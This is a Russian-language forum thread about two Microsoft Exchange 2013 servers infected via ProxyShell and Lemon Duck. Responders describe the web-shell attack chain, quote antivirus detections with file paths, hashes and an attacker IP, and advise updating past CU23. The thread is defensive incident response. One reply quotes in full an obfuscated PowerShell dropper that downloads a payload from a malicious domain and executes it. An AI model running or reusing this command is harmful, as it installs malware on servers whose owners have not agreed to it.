MS Exchange 2013 поймали заразу на двух серверах

RSS
Здравствуйте.
Собственно снова вирусы на двух MS Exchange 2013. В скриншоте показал строку c бякой.
Файл WACS.EXE нормальный, используется для сертификатов ssl.
Помогите отыскать заразу.

Ответы

возможен и такой вариант проникновения.

ProxyShell активно используется для установки веб-шеллов
В настоящее время эксплойт сбрасывает веб-оболочку размером 265 КБ в папку c: \ inetpub \ wwwroot \ aspnet_client \.
веб-оболочки состоят из простого защищенного аутентификацией сценария, который злоумышленники могут использовать для загрузки файлов на скомпрометированный сервер Microsoft Exchange.
злоумышленники используют первую веб-оболочку для загрузки дополнительной веб-оболочки в папку с удаленным доступом и два исполняемых файла в папки C: \ Windows \ System32
Если два исполняемых файла не могут быть найдены, в следующей папке будет создана другая веб-оболочка в виде файлов ASPX со случайным именем.
C: \ Program Files \ Microsoft \ Exchange Server \ V15 \ FrontEnd \ HttpProxy \ owa \ auth \
Злоумышленники используют вторую веб-оболочку для запуска исполняемого файла (пример: createhidetask.exe), который создает запланированную задачу с именем (например:PowerManager), которая запускает исполняемый файл (например:ApplicationUpdate.exe ) в 1 час ночи каждый день.
исполняемый файл ApplicationUpdate.exe - это пользовательский загрузчик .NET, используемый в качестве бэкдора.
«ApplicationUpdate.exe - это загрузчик .NET, который загружает другой двоичный файл .NET с удаленного сервера (который в настоящее время обслуживает полезную нагрузку)

https://www.bleepingcomputer.com/news/microsoft/hackers-now-backdoor-microsoft-exchange-using-proxyshell-exploits/

если смотреть по пред логам сканирования от мбам: (от 28.07)
Цитата
Backdoor.Hafnium.Shell, C:\USERS\M.KONDRATENKO\APPDATA\ROAMING\Microsoft\Windows\Recent\iisstar­t.aspx.lnk, Помещено в карантин, 16927, 926908, , , , , ED05CFED65BC2E502E951C135327EBB7, 76988CB834B065119A6960092FF61CAF7FA24DBC9F65E8EF469A2F6EB22F­6597
Backdoor.Hafnium.Shell, C:\INETPUB\WWWROOT\ASPNET_CLIENT\SYSTEM_WEB\IISSTART.ASPX, Помещено в карантин, 16927, 926908, 1.0.43628, , ame, , 0D5FB80F2F6ABF8182E82DC680F8F4B8, E9AB861970DDC99D06914A71D089EBA4E42F3216AEA3A43E1FD551FBDF9A­0E16

+
Цитата
-Информация о веб-сайте-
Категория: Троянская программа
Домен:
IP-адрес: 192.227.134.73
Порт: 443
Тип: Входящий трафик
Файл: System

может, стоит еще раз проверить сканированием в мбам, что он найдет в этот раз, после новых запусков.
что еще нужно проверить.

судя по списку установленного ПО, у вас версия 15.0.1497.2 кумулятивного обновления
Microsoft Exchange Server 2013 Cumulative Update 23
выпуск этого обновления был от
Exchange Server 2013 CU23 18 июня 2019 г. 15.0.1497.2 15.00.1497.002

после этого
Exchange Server 2013 CU23 18 июня 2019 г. 15.0.1497.2 15.00.1497.002
были еще новые выпуски:

  Exchange Server 2013 CU23 Jul21SU 13 июля 2021 г. 15.0.1497.23 15.00.1497.023
  Exchange Server 2013 CU23 May21SU 11 мая 2021 г. 15.0.1497.18 15.00.1497.018
  Exchange Server 2013 CU23 Apr21SU 13 апреля 2021 г. 15.0.1497.15 15.00.1497.015
  Exchange Server 2013 CU23 Mar21SU 2 марта 2021 г. 15.0.1497.12 15.00.1497.012

возможно,
некорректное отображение версии обновления в списке установленного ПО,
а возможно,
установлено неактуальное обновление для Microsoft Exchange Server 2013

https://docs.microsoft.com/ru-ru/exchange/new-features/build-numbers-and-release-dates
Цитата
RP55 RP55 написал:
+
https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

здесь RP55, скорее прав,
что атака была и с этой стороны, судя по тому, что в одном из апрельских образов (на другом почт сервере), запускался такой скрипт.

Код
"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97asd123';$ifp=$env:tmp+'\m6.bin';$down_url='хттп://[B]d.hwqloan.com[/B]';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&VMCTFH-MAIL^^^&36780342-A764-974C-DAE2-ACFBD65CC3C0^^^&00:50:56:83:FF:5F');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|CzdpTG6VH1.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe 

но там после уст патчей все затихло сразу. те данная атака прекратилась.

(хотя и не факт, что именно они сейчас запускают майнер)
Спасибо. Сейчас буду проверять всё что ниписали. Но с того момента как заблокировал всю хетслерскую сеть, так уже вторую неделю не видим проблем. Но проверять нужно.
Цитата
Владимир Шариков написал:
Спасибо. Сейчас буду проверять всё что ниписали. Но с того момента как заблокировал всю хетслерскую сеть, так уже вторую неделю не видим проблем. Но проверять нужно.
а по логам DNS можете проверить, были из внутренней сети попытки подключения на заблокированные адреса?
Читают тему (гостей: 2)